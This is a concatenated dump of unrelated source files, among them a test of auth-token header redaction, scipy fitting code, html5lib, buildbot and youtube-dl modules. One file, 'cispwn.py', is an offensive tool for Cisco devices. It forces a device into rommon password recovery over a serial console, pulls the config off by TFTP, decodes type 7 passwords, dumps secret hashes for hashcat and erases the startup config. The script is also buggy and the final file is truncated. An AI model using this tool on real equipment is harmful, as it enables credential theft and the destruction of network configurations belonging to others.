self.assertFalse(mock_ks_session.called)
def test_safe_header_with_auth_token(self):
(name, value) = ('X-Auth-Token', u'3b640e2e64d946ac8f55615aff221dc1')
expected_header = (u'X-Auth-Token',
'{SHA1}6de9fb3b0b89099030a54abfeb468e7b1b1f0f2b')
client = http.HTTPClient('http://localhost/')
header_redact = client._process_header(name, value)
self.assertEqual(expected_header, header_redact)
def test_safe_header_with_no_auth_token(self):
name, value = ('Accept', 'application/json')
header = ('Accept', 'application/json')
client = http.HTTPClient('http://localhost/')
header_redact = client._process_header(name, value)
self.assertEqual(header, header_redact)
|
srio/BeamlineComponents
|
refs/heads/master
|
Source/UndulatorVertical.py
|
1
|
from BeamlineComponents.Source.Undulator import Undulator
class UndulatorVertical(Undulator):
def __init__(self,K , period_length, period_number):
Undulator.__init__(self,
K_vertical=K,
K_horizontal=0.0,
period_length=period_length,
periods_number=period_number)
def K(self):
K = self.K_vertical()
def B(self):
return self._magneticFieldStrengthFromK(self.K())
|
dylup/cispwn
|
refs/heads/master
|
cispwn.py
|
1
|
#!/usr/bin/python
import serial
import sys
import getopt
import time
import os
import subprocess
version = 'Version 0.2'
tftp = 0
copied = 0
router = 0
switch = 0
asa = 0
passwords = 0
password = []
interface = []
password_list = []
ip_submask = subprocess.check_output("ifconfig")
router = subprocess.check_output(['route', '-n'])
#ser = serial.Serial('/dev/ttyUSB0') # open serial port
#print (ser.name) # check which port was really used
#ser.close() # close
#test
#Upon power cycling, loops the command until the router boots with a blank config. It then enables higher priviledges for further commands to be run.
def rommon(console):
select = False
rom = False
global router
global asa
global switch
print "Attempting to identify device type"
while select == False:
prompt = read_serial(console)
print prompt
if 'Self decompressing the image' in prompt:
router = 1
switch = 0
asa = 0
select = True
print "Router selected"
elif 'rommon' in prompt:
asa = 1
switch = 0
router = 0
select = True
print "ASA Selected"
elif 'Use break or ESC to interrupt boot' in prompt or 'Launching BootLoader' in prompt or "seconds" in prompt:
asa = 1
switch = 0
router = 0
select = True
print "ASA Selected"
elif "Loading flash:/" in prompt:
switch = 1
router = 0
asa = 0
select = True
print "Switch selected"
else:
print "Error, a type could not be identified. This script will wait for 5 seconds and loop again."
time.sleep(5)
while rom == False:
#Checks if the config has already been loaded
if router == 1:
if "Press RETURN" in prompt:
print "Power cycle the router again. This script will wait for 10 seconds and loop again."
time.sleep(10)
#Sends the Ctrl+C to stop the boot and enter rommon
elif "Self decompressing the image" in prompt:
send_command(console, cmd = '\x03')
rom = True
print "rommon is ready"
elif "Continue with configuration dialog" in prompt:
print "Error: The router does not have a saved config"
sys.exit()
#Boots the router in recovery mode
send_command(console, cmd = 'confreg 2042')
send_command(console, cmd = 'boot')
print "Booting"
time.sleep(30)
send_command(console, cmd = 'no')
send_command(console, cmd = '')
send_command(console, cmd = 'enable')
elif asa == 1:
if "Reading from flash" in prompt or "Launching bootloader" in prompt:
print "Power cycle the ASA again. This script will wait for 10 seconds and loop again."
time.sleep(10)
prompt = read_serial(console)
else:
if rom == False:
send_command(console, cmd = '\x1B')
rom = True
print "rommon is ready"
time.sleep(5)
send_command(console, cmd = 'confreg 0x41')
time.sleep(15)
send_command(console, cmd = 'confreg')
send_command(console, cmd ='y')
send_command(console, cmd = '')
send_command(console, cmd = '')
send_command(console, cmd = '')
send_command(console, cmd = '')
send_command(console, cmd = 'y')
send_command(console, cmd = '')
send_command(console, cmd = '')
send_command(console, cmd = '')
time.sleep(10)
send_command(console, cmd = 'boot')
print "Booting"
time.sleep(40)
send_command(console, cmd = 'no')
send_command(console, cmd = '')
send_command(console, cmd = 'enable')
send_command(console, cmd = '')
'''
elif switch == 1:
print "The switch must be manually reset by hand. Look online for instructions for your specific switch model. This script will loop until it detects the recovery mode"
recovery = False
while recovery == False:
#if statement for switch prompt goes here
'''
#sets IP settings of the router's interface
def tftp_setup(console):
global router
global asa
global switch
global tftp
if router == 1:
send_command(console, cmd = 'config t')
send_command(console, cmd = 'do show ip int brief')
send_command(console, cmd = '\40')
send_command(console, cmd = '\40')
send_command(console, cmd = '\40')
prompt = read_serial(console)
#Checks whether a Gigabit interface is available, if not, it defaults to the first FastEthernet interface.
print "Setting interface options"
if "GigabitEthernet0/0" in prompt:
send_command(console, cmd = 'interface Gig0/0')
else:
send_command(console, cmd = 'interface Fa0/0')
send_command(console, cmd = 'no shut')
send_command(console, cmd = 'ip addr 192.168.1.1 255.255.255.0')
send_command(console, cmd = '\x03')
send_command(console, cmd = '')
print "Interface options set"
tftp = 1
elif asa == 1:
send_command(console, cmd = 'config t')
print "Setting interface options"
send_command(console, cmd = 'int vlan 1')
send_command(console, cmd = 'ip addr 192.168.1.1 255.255.255.0')
send_command(console, cmd = 'no shut')
send_command(console, cmd = 'security-level 0')
send_command(console, cmd = 'nameif inside')
send_command(console, cmd = 'int Eth 0/0')
send_command(console, cmd = 'switchport mode access')
send_command(console, cmd = 'switchport access vlan 1')
send_command(console, cmd = 'no shut')
send_command(console, cmd = 'exit')
send_command(console, cmd = 'exit')
send_command(console, cmd = '')
print "Interface options set"
tftp = 1
elif switch == 1:
send_command(console, cmd= 'config t')
print "Setting interface options"
send_command(console, cmd = 'int vlan 1')
send_command(console, cmd = 'ip addr 192.168.1.1 255.255.255.0')
send_command(console, cmd = 'no shut')
send_command(console, cmd = 'do sh ip int br')
send_command(console, cmd = '')
send_command(console, cmd = '')
send_command(console, cmd = '')
#Checks whether a Gigabit interface is available, if not, it defaults to the first FastEthernet interface.
prompt=read_serial(console)
if "GigabitEthernet" in prompt:
send_command(console, cmd = 'interface Gig0/1')
else:
send_command(console, cmd = 'interface Fa0/1')
send_command(console, cmd = 'switch mode access')
send_command(console, cmd = 'switch access vlan 1')
send_command(console, cmd = 'no shut')
send_command(console, cmd = 'exit')
send_command(console, cmd = 'exit')
send_command(console, cmd = '')
subprocess.check_call(['ping','-c3','192.168.1.1'])
time.sleep(5)
print "Interface options set"
tftp = 1
def copy_config(console):
#tftp the config file to the host machine for further commands
global tftp
global copied
print tftp
if tftp == 0:
tftp_setup(console)
send_command(console, cmd = 'copy run start')
send_command(console, cmd = '')
send_command(console, cmd = 'copy startup-config tftp:')
send_command(console, cmd = '192.168.1.2')
send_command(console, cmd = 'cispwn-config.txt')
copied = 1
def crack_password(password):
plaintext = ''
xlat = "dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"
i = 2
val = 0
seed = (ord(password[0]) - 0x30) * 10 + ord(password[1]) - 0x30
while i < len(password):
if (i != 2 and not(i & 1)):
plaintext += chr(val ^ ord(xlat[seed]))
seed += 1
seed %= len(xlat)
val = 0
val *= 16
c = password[i]
if(c.isdigit()):
val += ord(password[i]) - 0x30
if(ord(password[i]) >= 0x41 and ord(password[i]) <= 0x46):
val += ord(password[i]) - 0x41 + 0x0a
i += 1
plaintext += chr(val ^ ord(xlat[seed]))
return plaintext
def decrypt_level7_passwords(console):
global copied
global router
global switch
global password_list
global passwords
global asa
if copied == 0:
copy_config()
config = open ('/srv/tftp/cispwn-config.txt', 'r')
#and parse the file for cisco 7 passwords, then crack them and display them in plaintext
if router == 1 or switch == 1:
for line in config:
if "password 7 ":
line = line.replace("password 7 ", "")
password.append(line)
passwords += 1
interface.append(prevline)
prevline = line
i = 0
while i < passwords:
cracked = crack_password(password[i])
password[i] = cracked
i += 1
i = 0
txt = open("passwords.txt", "w")
while i < passwords:
password_list[i] = interface[i] +":"+ password[i]
txt.write("%s\n" % password_list[i])
i += 1
txt.close()
print("The passwords and interfaces will be located in the passwords.txt file")
def hash_grab(console):
global switch
global router
global asa
if asa == 1:
#grab the hash, store in file, tell user to crack manually/bruteforce
for line in config:
if "password ":
if "username":
line = line.replace("username ", "")
line = line.replace(" password ",":")
line = line.replace(" encrypted","")
password.append(line)
passwords += 1
elif "enable password":
line = line.replace("enable password ", "")
line = line.replace(" encrypted", "")
txt2 = open("asa_host_hash.txt", "w")
txt.write("%s\n" % line)
i = 0
txt = open("asa_hash.txt", "w")
while i < passwords:
txt.write("%s\n" % password[i])
i += 1
txt.close()
print("The hashes will be located in the asa_hash.txt file, use hashcat to crack these. The hash type will be specified in the README")
elif switch == 1 or router == 1:
for line in config:
if "secret 5":
if "enable":
line = line.replace("enable secret 5 ","enable:")
passwords.append(line)
passwords += 1
else:
line = line.replace("username ","")
line = line.replace(" secret 5 ",":")
password.append(line)
passwords += 1
if switch == 1:
txt = open("switch_hash.txt", "w")
while i < passwords:
txt.write("%s\n" % password[i])
i += 1
txt.close()
print("The hashes will be located in the switch_hash.txt file, use hashcat to crack these. The hash type will be type 500.")
else:
txt = open("router_hash.txt", "w")
while i < passwords:
txt.write("%s\n" % password[i])
i += 1
txt.close()
print("The hashes will be located in the router_hash.txt file, use hashcat to crack these. The hash type will be type 500.")
def delete_config(console):
#delete the startup config file
if router == 1:
send_command(console, cmd = 'erase startup-config')
send_command(console, cmd = '')
print "config was deleted"
elif asa == 1:
send_command(console, cmd = 'write erase')
send_command(console, cmd = '')
print "config was deleted"
elif switch == 1:
send_command(console, cmd = 'write erase')
send_command(console, cmd = '')
print "config was deleted"
def ip_check():
global ip_submask
global router
if not "inet addr:192.168.1.2" in ip_submask or not "Mask:255.255.255.0" in ip_submask or not "0.0.0.0 192.168.1.1" in router:
print 'Error, your network interface settings are incorrect'
sys.exit()
def console_grab():
return ""
#def brick_device(console):
#deletes every system image on the device, requires external image to get it working again.
def read_serial(console):
#Checks to see if there are bytes waiting to be read, and reads them. If no bytes are found, it returns a null string.
data_bytes = console.inWaiting()
if data_bytes:
return console.read(data_bytes)
else:
return ""
#might remove reading portion for less output to screen
def send_command(console,cmd = ''):
#Sends a command to the router and returns the bytes in waiting as output.
console.write(cmd+'\n')
time.sleep(2)
print read_serial(console)
def main(argv):
try:
opts, args = getopt.getopt(argv, "hV", ['help',
'version'])
except getopt.GetoptError:
print 'Usage: ./cispwn.py <args>'
sys.exit(2)
for opt, arg in opts:
if opt in ('-h', '--help'):
print 'Usage: ./cispwn.py\n'
print 'Arguments:'
print '\t-V or --version\t\tShow version info'
print '\t-h or --help\t\tShow this screen'
sys.exit()
if opt in ('-V', '--version'):
print 'cispwn.py ' + version
sys.exit()
#grab specific usb port based on dev script
'''console=serial.Serial(
port = '/dev/ttyUSB0',
baudrate = 9600,
parity = "N",
stopbits = 1,
bytesize = 8,
timeout = 8
)
if not console.isOpen():
print 'Error, a connection could not be made'
sys.exit()'''
#check if IP address/subnet mask match using netifaces, if not, exit the program
ip_check()
#Function for entering rommon goes here
rommon(console)
copy_config(console)
decrypt_level7_passwords(console)
delete_config(console)
if __name__ == "__main__":
main(sys.argv[1:])
|
PongPi/isl-odoo
|
refs/heads/8.0
|
addons/web_linkedin/__init__.py
|
442
|
import web_linkedin
|
jeezybrick/django
|
refs/heads/master
|
tests/model_meta/__init__.py
|
12133432
| |
Gagaro/django
|
refs/heads/master
|
tests/gis_tests/geoadmin/__init__.py
|
12133432
| |
google/slo-generator
|
refs/heads/master
|
samples/custom/__init__.py
|
12133432
| |
jbking/demo-appengine-django-golang
|
refs/heads/master
|
myproject/django/conf/locale/he/__init__.py
|
12133432
| |
AstroFloyd/LearningPython
|
refs/heads/master
|
Fitting/scipy.optimize.least_squares_2_loss.py
|
1
|
#!/bin/env python3
# https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.least_squares.html
"""Solve a curve fitting problem using robust loss function to take care of outliers in the data. Define the
model function as y = a + b * exp(c * t), where t is a predictor variable, y is an observation and a, b, c are
parameters to estimate. Use different 'loss functions'.
"""
import numpy as np
from scipy.optimize import least_squares
# Function which generates the data with noise and outliers:
def gen_data(t, a, b, c, noise=0, n_outliers=0, random_state=0):
y = a + b * np.exp(t * c)
rnd = np.random.RandomState(random_state)
error = noise * rnd.randn(t.size)
outliers = rnd.randint(0, t.size, n_outliers)
error[outliers] *= 10
return y + error
# Function for computing residuals:
def fun(x, t, y):
return x[0] + x[1] * np.exp(x[2] * t) - y
# Define the model parameters:
a = 0.5
b = 2.0
c = -1
t_min = 0
t_max = 10
n_points = 15
# Generate the data:
t_train = np.linspace(t_min, t_max, n_points)
y_train = gen_data(t_train, a, b, c, noise=0.1, n_outliers=3)
# Initial estimate of parameters:
x0 = np.array([1.0, 1.0, 0.0])
# Compute a standard least-squares solution:
res_lsq = least_squares(fun, x0, args=(t_train, y_train))
print('res_lsq: ', res_lsq)
# Now compute two solutions with two different robust loss functions. The parameter f_scale is set to 0.1,
# meaning that inlier residuals should not significantly exceed 0.1 (the noise level used):
res_soft_l1 = least_squares(fun, x0, loss='soft_l1', f_scale=0.1, args=(t_train, y_train))
print('res_soft_l1: ', res_soft_l1)
res_log = least_squares(fun, x0, loss='cauchy', f_scale=0.1, args=(t_train, y_train))
print('res_log: ', res_log)
# Plot all the curves. We see that by selecting an appropriate loss we can get estimates close to
# optimal even in the presence of strong outliers. But keep in mind that generally it is recommended to try
# 'soft_l1' or 'huber' losses first (if at all necessary) as the other two options may cause difficulties in
# optimization process.
t_test = np.linspace(t_min, t_max, n_points * 10)
y_true = gen_data(t_test, a, b, c)
y_lsq = gen_data(t_test, *res_lsq.x)
y_soft_l1 = gen_data(t_test, *res_soft_l1.x)
y_log = gen_data(t_test, *res_log.x)
import matplotlib.pyplot as plt
#plt.style.use('dark_background') # Invert colours
plt.plot(t_train, y_train, 'o')
plt.plot(t_test, y_true, 'k', linewidth=2, label='true')
plt.plot(t_test, y_lsq, label='linear loss')
plt.plot(t_test, y_soft_l1, label='soft_l1 loss')
plt.plot(t_test, y_log, label='cauchy loss')
plt.xlabel("t")
plt.ylabel("y")
plt.legend()
plt.tight_layout()
# plt.show()
plt.savefig('scipy.optimize.least_squares_2_loss.png') # Save the plot as png
plt.close() # Close the plot in order to start a new one later
print()
|
deandunbar/bitwave
|
refs/heads/master
|
hackathon_version/venv/lib/python2.7/site-packages/pip/_vendor/html5lib/treebuilders/__init__.py
|
1730
|
"""A collection of modules for building different kinds of tree from
HTML documents.
To create a treebuilder for a new type of tree, you need to do
implement several things:
1) A set of classes for various types of elements: Document, Doctype,
Comment, Element. These must implement the interface of
_base.treebuilders.Node (although comment nodes have a different
signature for their constructor, see treebuilders.etree.Comment)
Textual content may also be implemented as another node type, or not, as
your tree implementation requires.
2) A treebuilder object (called TreeBuilder by convention) that
inherits from treebuilders._base.TreeBuilder. This has 4 required attributes:
documentClass - the class to use for the bottommost node of a document
elementClass - the class to use for HTML Elements
commentClass - the class to use for comments
doctypeClass - the class to use for doctypes
It also has one required method:
getDocument - Returns the root node of the complete document tree
3) If you wish to run the unit tests, you must also create a
testSerializer method on your treebuilder which accepts a node and
returns a string containing Node and its children serialized according
to the format used in the unittests
"""
from __future__ import absolute_import, division, unicode_literals
from ..utils import default_etree
treeBuilderCache = {}
def getTreeBuilder(treeType, implementation=None, **kwargs):
"""Get a TreeBuilder class for various types of tree with built-in support
treeType - the name of the tree type required (case-insensitive). Supported
values are:
"dom" - A generic builder for DOM implementations, defaulting to
a xml.dom.minidom based implementation.
"etree" - A generic builder for tree implementations exposing an
ElementTree-like interface, defaulting to
xml.etree.cElementTree if available and
xml.etree.ElementTree if not.
"lxml" - A etree-based builder for lxml.etree, handling
limitations of lxml's implementation.
implementation - (Currently applies to the "etree" and "dom" tree types). A
module implementing the tree type e.g.
xml.etree.ElementTree or xml.etree.cElementTree."""
treeType = treeType.lower()
if treeType not in treeBuilderCache:
if treeType == "dom":
from . import dom
# Come up with a sane default (pref. from the stdlib)
if implementation is None:
from xml.dom import minidom
implementation = minidom
# NEVER cache here, caching is done in the dom submodule
return dom.getDomModule(implementation, **kwargs).TreeBuilder
elif treeType == "lxml":
from . import etree_lxml
treeBuilderCache[treeType] = etree_lxml.TreeBuilder
elif treeType == "etree":
from . import etree
if implementation is None:
implementation = default_etree
# NEVER cache here, caching is done in the etree submodule
return etree.getETreeModule(implementation, **kwargs).TreeBuilder
else:
raise ValueError("""Unrecognised treebuilder "%s" """ % treeType)
return treeBuilderCache.get(treeType)
|
denny820909/builder
|
refs/heads/master
|
lib/python2.7/site-packages/buildbot-0.8.8-py2.7.egg/buildbot/steps/source/svn.py
|
4
|
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
import xml.dom.minidom
import xml.parsers.expat
from twisted.python import log
from twisted.internet import defer
from buildbot.process import buildstep
from buildbot.steps.source.base import Source
from buildbot.interfaces import BuildSlaveTooOldError
from buildbot.config import ConfigErrors
class SVN(Source):
"""I perform Subversion checkout/update operations."""
name = 'svn'
renderables = [ 'repourl' ]
possible_modes = ('incremental', 'full')
possible_methods = ('clean', 'fresh', 'clobber', 'copy', 'export', None)
def __init__(self, repourl=None, mode='incremental',
method=None, username=None,
password=None, extra_args=None, keep_on_purge=None,
depth=None, preferLastChangedRev=False, **kwargs):
self.repourl = repourl
self.username = username
self.password = password
self.extra_args = extra_args
self.keep_on_purge = keep_on_purge or []
self.depth = depth
self.method = method
self.mode = mode
self.preferLastChangedRev = preferLastChangedRev
Source.__init__(self, **kwargs)
errors = []
if self.mode not in self.possible_modes:
errors.append("mode %s is not one of %s" % (self.mode, self.possible_modes))
if self.method not in self.possible_methods:
errors.append("method %s is not one of %s" % (self.method, self.possible_methods))
if repourl is None:
errors.append("you must provide repourl")
if errors:
raise ConfigErrors(errors)
def startVC(self, branch, revision, patch):
self.revision = revision
self.method = self._getMethod()
self.stdio_log = self.addLogForRemoteCommands("stdio")
d = self.checkSvn()
def checkInstall(svnInstalled):
if not svnInstalled:
raise BuildSlaveTooOldError("SVN is not installed on slave")
return 0
d.addCallback(checkInstall)
if self.mode == 'full':
d.addCallback(self.full)
elif self.mode == 'incremental':
d.addCallback(self.incremental)
d.addCallback(self.parseGotRevision)
d.addCallback(self.finish)
d.addErrback(self.failed)
return d
@defer.inlineCallbacks
def full(self, _):
if self.method == 'clobber':
yield self.clobber()
return
elif self.method in ['copy', 'export']:
yield self.copy()
return
updatable = yield self._sourcedirIsUpdatable()
if not updatable:
# blow away the old (un-updatable) directory
yield self.runRmdir(self.workdir)
# then do a checkout
checkout_cmd = ['checkout', self.repourl, '.']
if self.revision:
checkout_cmd.extend(["--revision", str(self.revision)])
yield self._dovccmd(checkout_cmd)
elif self.method == 'clean':
yield self.clean()
elif self.method == 'fresh':
yield self.fresh()
@defer.inlineCallbacks
def incremental(self, _):
updatable = yield self._sourcedirIsUpdatable()
if not updatable:
# blow away the old (un-updatable) directory
yield self.runRmdir(self.workdir)
# and plan to do a checkout
command = ['checkout', self.repourl, '.']
else:
# otherwise, do an update
command = ['update']
if self.revision:
command.extend(['--revision', str(self.revision)])
yield self._dovccmd(command)
@defer.inlineCallbacks
def clobber(self):
yield self.runRmdir(self.workdir)
checkout_cmd = ['checkout', self.repourl, '.']
if self.revision:
checkout_cmd.extend(["--revision", str(self.revision)])
yield self._dovccmd(checkout_cmd)
def fresh(self):
d = self.purge(True)
cmd = ['update']
if self.revision:
cmd.extend(['--revision', str(self.revision)])
d.addCallback(lambda _: self._dovccmd(cmd))
return d
def clean(self):
d = self.purge(False)
cmd = ['update']
if self.revision:
cmd.extend(['--revision', str(self.revision)])
d.addCallback(lambda _: self._dovccmd(cmd))
return d
@defer.inlineCallbacks
def copy(self):
yield self.runRmdir(self.workdir)
# temporarily set workdir = 'source' and do an incremental checkout
try:
old_workdir = self.workdir
self.workdir = 'source'
yield self.incremental(None)
except: # finally doesn't work in python-2.4
self.workdir = old_workdir
raise
self.workdir = old_workdir
# if we're copying, copy; otherwise, export from source to build
if self.method == 'copy':
cmd = buildstep.RemoteCommand('cpdir',
{ 'fromdir': 'source', 'todir':self.workdir,
'logEnviron': self.logEnviron })
else:
export_cmd = ['svn', 'export']
if self.revision:
export_cmd.extend(["--revision", str(self.revision)])
export_cmd.extend(['source', self.workdir])
cmd = buildstep.RemoteShellCommand('', export_cmd,
env=self.env, logEnviron=self.logEnviron, timeout=self.timeout)
cmd.useLog(self.stdio_log, False)
yield self.runCommand(cmd)
if cmd.didFail():
raise buildstep.BuildStepFailed()
def finish(self, res):
d = defer.succeed(res)
def _gotResults(results):
self.setStatus(self.cmd, results)
return results
d.addCallback(_gotResults)
d.addCallbacks(self.finished, self.checkDisconnect)
return d
def _dovccmd(self, command, collectStdout=False):
assert command, "No command specified"
command.extend(['--non-interactive', '--no-auth-cache'])
if self.username:
command.extend(['--username', self.username])
if self.password:
command.extend(['--password', self.password])
if self.depth:
command.extend(['--depth', self.depth])
if self.extra_args:
command.extend(self.extra_args)
cmd = buildstep.RemoteShellCommand(self.workdir, ['svn'] + command,
env=self.env,
logEnviron=self.logEnviron,
timeout=self.timeout,
collectStdout=collectStdout)
cmd.useLog(self.stdio_log, False)
log.msg("Starting SVN command : svn %s" % (" ".join(command), ))
d = self.runCommand(cmd)
def evaluateCommand(cmd):
if cmd.didFail():
log.msg("Source step failed while running command %s" % cmd)
raise buildstep.BuildStepFailed()
if collectStdout:
return cmd.stdout
else:
return cmd.rc
d.addCallback(lambda _: evaluateCommand(cmd))
return d
def _getMethod(self):
if self.method is not None and self.mode != 'incremental':
return self.method
elif self.mode == 'incremental':
return None
elif self.method is None and self.mode == 'full':
return 'fresh'
@defer.inlineCallbacks
def _sourcedirIsUpdatable(self):
# first, perform a stat to ensure that this is really an svn directory
res = yield self.pathExists(self.build.path_module.join(self.workdir, '.svn'))
if not res:
defer.returnValue(False)
return
# then run 'svn info --xml' to check that the URL matches our repourl
stdout = yield self._dovccmd(['info', '--xml'], collectStdout=True)
try:
stdout_xml = xml.dom.minidom.parseString(stdout)
extractedurl = stdout_xml.getElementsByTagName('url')[0].firstChild.nodeValue
except xml.parsers.expat.ExpatError:
msg = "Corrupted xml, aborting step"
self.stdio_log.addHeader(msg)
raise buildstep.BuildStepFailed()
defer.returnValue(extractedurl == self.repourl)
return
@defer.inlineCallbacks
def parseGotRevision(self, _):
# if this was a full/export, then we need to check svnversion in the
# *source* directory, not the build directory
svnversion_dir = self.workdir
if self.mode == 'full' and self.method == 'export':
svnversion_dir = 'source'
cmd = buildstep.RemoteShellCommand(svnversion_dir, ['svn', 'info', '--xml'],
env=self.env,
logEnviron=self.logEnviron,
timeout=self.timeout,
collectStdout=True)
cmd.useLog(self.stdio_log, False)
yield self.runCommand(cmd)
stdout = cmd.stdout
try:
stdout_xml = xml.dom.minidom.parseString(stdout)
except xml.parsers.expat.ExpatError:
msg = "Corrupted xml, aborting step"
self.stdio_log.addHeader(msg)
raise buildstep.BuildStepFailed()
revision = None
if self.preferLastChangedRev:
try:
revision = stdout_xml.getElementsByTagName('commit')[0].attributes['revision'].value
except (KeyError, IndexError):
msg =("SVN.parseGotRevision unable to detect Last Changed Rev in"
" output of svn info")
log.msg(msg)
# fall through and try to get 'Revision' instead
if revision is None:
try:
revision = stdout_xml.getElementsByTagName('entry')[0].attributes['revision'].value
except (KeyError, IndexError):
msg =("SVN.parseGotRevision unable to detect revision in"
" output of svn info")
log.msg(msg)
raise buildstep.BuildStepFailed()
msg = "Got SVN revision %s" % (revision, )
self.stdio_log.addHeader(msg)
self.updateSourceProperty('got_revision', revision)
defer.returnValue(cmd.rc)
def purge(self, ignore_ignores):
"""Delete everything that shown up on status."""
command = ['status', '--xml']
if ignore_ignores:
command.append('--no-ignore')
d = self._dovccmd(command, collectStdout=True)
def parseAndRemove(stdout):
files = []
for filename in self.getUnversionedFiles(stdout, self.keep_on_purge):
filename = self.workdir+'/'+str(filename)
files.append(filename)
if len(files) == 0:
d = defer.succeed(0)
else:
if self.slaveVersionIsOlderThan('rmdir', '2.14'):
d = self.removeFiles(files)
else:
d = self.runRmdir(files, abandonOnFailure=False)
return d
d.addCallback(parseAndRemove)
def evaluateCommand(rc):
if rc != 0:
log.msg("Failed removing files")
raise buildstep.BuildStepFailed()
return rc
d.addCallback(evaluateCommand)
return d
@staticmethod
def getUnversionedFiles(xmlStr, keep_on_purge):
try:
result_xml = xml.dom.minidom.parseString(xmlStr)
except xml.parsers.expat.ExpatError:
log.err("Corrupted xml, aborting step")
raise buildstep.BuildStepFailed()
for entry in result_xml.getElementsByTagName('entry'):
(wc_status,) = entry.getElementsByTagName('wc-status')
if wc_status.getAttribute('item') == 'external':
continue
if wc_status.getAttribute('item') == 'missing':
continue
filename = entry.getAttribute('path')
if filename in keep_on_purge or filename == '':
continue
yield filename
@defer.inlineCallbacks
def removeFiles(self, files):
for filename in files:
res = yield self.runRmdir(filename, abandonOnFailure=False)
if res:
defer.returnValue(res)
return
defer.returnValue(0)
def checkSvn(self):
cmd = buildstep.RemoteShellCommand(self.workdir, ['svn', '--version'],
env=self.env,
logEnviron=self.logEnviron,
timeout=self.timeout)
cmd.useLog(self.stdio_log, False)
d = self.runCommand(cmd)
def evaluate(cmd):
if cmd.rc != 0:
return False
return True
d.addCallback(lambda _: evaluate(cmd))
return d
def computeSourceRevision(self, changes):
if not changes or None in [c.revision for c in changes]:
return None
lastChange = max([int(c.revision) for c in changes])
return lastChange
|
lanen/youtube-dl
|
refs/heads/master
|
youtube_dl/extractor/screenwavemedia.py
|
58
|
# encoding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
int_or_none,
unified_strdate,
js_to_json,
)
class ScreenwaveMediaIE(InfoExtractor):
_VALID_URL = r'https?://player\d?\.screenwavemedia\.com/(?:play/)?[a-zA-Z]+\.php\?.*\bid=(?P<id>[A-Za-z0-9-]+)'
EMBED_PATTERN = r'src=(["\'])(?P<url>(?:https?:)?//player\d?\.screenwavemedia\.com/(?:play/)?[a-zA-Z]+\.php\?.*\bid=.+?)\1'
_TESTS = [{
'url': 'http://player.screenwavemedia.com/play/play.php?playerdiv=videoarea&companiondiv=squareAd&id=Cinemassacre-19911',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
playerdata = self._download_webpage(
'http://player.screenwavemedia.com/player.php?id=%s' % video_id,
video_id, 'Downloading player webpage')
vidtitle = self._search_regex(
r'\'vidtitle\'\s*:\s*"([^"]+)"', playerdata, 'vidtitle').replace('\\/', '/')
playerconfig = self._download_webpage(
'http://player.screenwavemedia.com/player.js',
video_id, 'Downloading playerconfig webpage')
videoserver = self._search_regex(r'SWMServer\s*=\s*"([\d\.]+)"', playerdata, 'videoserver')
sources = self._parse_json(
js_to_json(
re.sub(
r'(?s)/\*.*?\*/', '',
self._search_regex(
r"sources\s*:\s*(\[[^\]]+?\])", playerconfig,
'sources',
).replace(
"' + thisObj.options.videoserver + '",
videoserver
).replace(
"' + playerVidId + '",
video_id
)
)
),
video_id, fatal=False
)
# Fallback to hardcoded sources if JS changes again
if not sources:
self.report_warning('Falling back to a hardcoded list of streams')
sources = [{
'file': 'http://%s/vod/%s_%s.mp4' % (videoserver, video_id, format_id),
'type': 'mp4',
'label': format_label,
} for format_id, format_label in (
('low', '144p Low'), ('med', '160p Med'), ('high', '360p High'), ('hd1', '720p HD1'))]
sources.append({
'file': 'http://%s/vod/smil:%s.smil/playlist.m3u8' % (videoserver, video_id),
'type': 'hls',
})
formats = []
for source in sources:
if source['type'] == 'hls':
formats.extend(self._extract_m3u8_formats(source['file'], video_id))
else:
file_ = source.get('file')
if not file_:
continue
format_label = source.get('label')
format_id = self._search_regex(
r'_(.+?)\.[^.]+$', file_, 'format id', default=None)
height = int_or_none(self._search_regex(
r'^(\d+)[pP]', format_label, 'height', default=None))
formats.append({
'url': source['file'],
'format_id': format_id,
'format': format_label,
'ext': source.get('type'),
'height': height,
})
self._sort_formats(formats)
return {
'id': video_id,
'title': vidtitle,
'formats': formats,
}
class TeamFourIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?teamfourstar\.com/video/(?P<id>[a-z0-9\-]+)/?'
_TEST = {
'url': 'http://teamfourstar.com/video/a-moment-with-tfs-episode-4/',
'info_dict': {
'id': 'TeamFourStar-5292a02f20bfa',
'ext': 'mp4',
'upload_date': '20130401',
'description': 'Check out this and more on our website: http://teamfourstar.com\nTFS Store: http://sharkrobot.com/team-four-star\nFollow on Twitter: http://twitter.com/teamfourstar\nLike on FB: http://facebook.com/teamfourstar',
'title': 'A Moment With TFS Episode 4',
}
}
def _real_extract(self, url):
display_id = self._match_id(url)
webpage = self._download_webpage(url, display_id)
playerdata_url = self._search_regex(
r'src="(http://player\d?\.screenwavemedia\.com/(?:play/)?[a-zA-Z]+\.php\?[^"]*\bid=.+?)"',
webpage, 'player data URL')
video_title = self._html_search_regex(
r'<div class="heroheadingtitle">(?P<title>.+?)</div>',
webpage, 'title')
video_date = unified_strdate(self._html_search_regex(
r'<div class="heroheadingdate">(?P<date>.+?)</div>',
webpage, 'date', fatal=False))
video_description = self._html_search_regex(
r'(?s)<div class="postcontent">(?P<description>.+?)</div>',
webpage, 'description', fatal=False)
video_thumbnail = self._og_search_thumbnail(webpage)
return {
'_type': 'url_transparent',
'display_id': display_id,
'title': video_title,
'description': video_description,
'upload_date': video_date,
'thumbnail': video_thumbnail,
'url': playerdata_url,
}
|
anhstudios/swganh
|
refs/heads/develop
|
data/scripts/templates/object/tangible/hair/bothan/shared_hair_bothan_female_s04.py
|
2
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
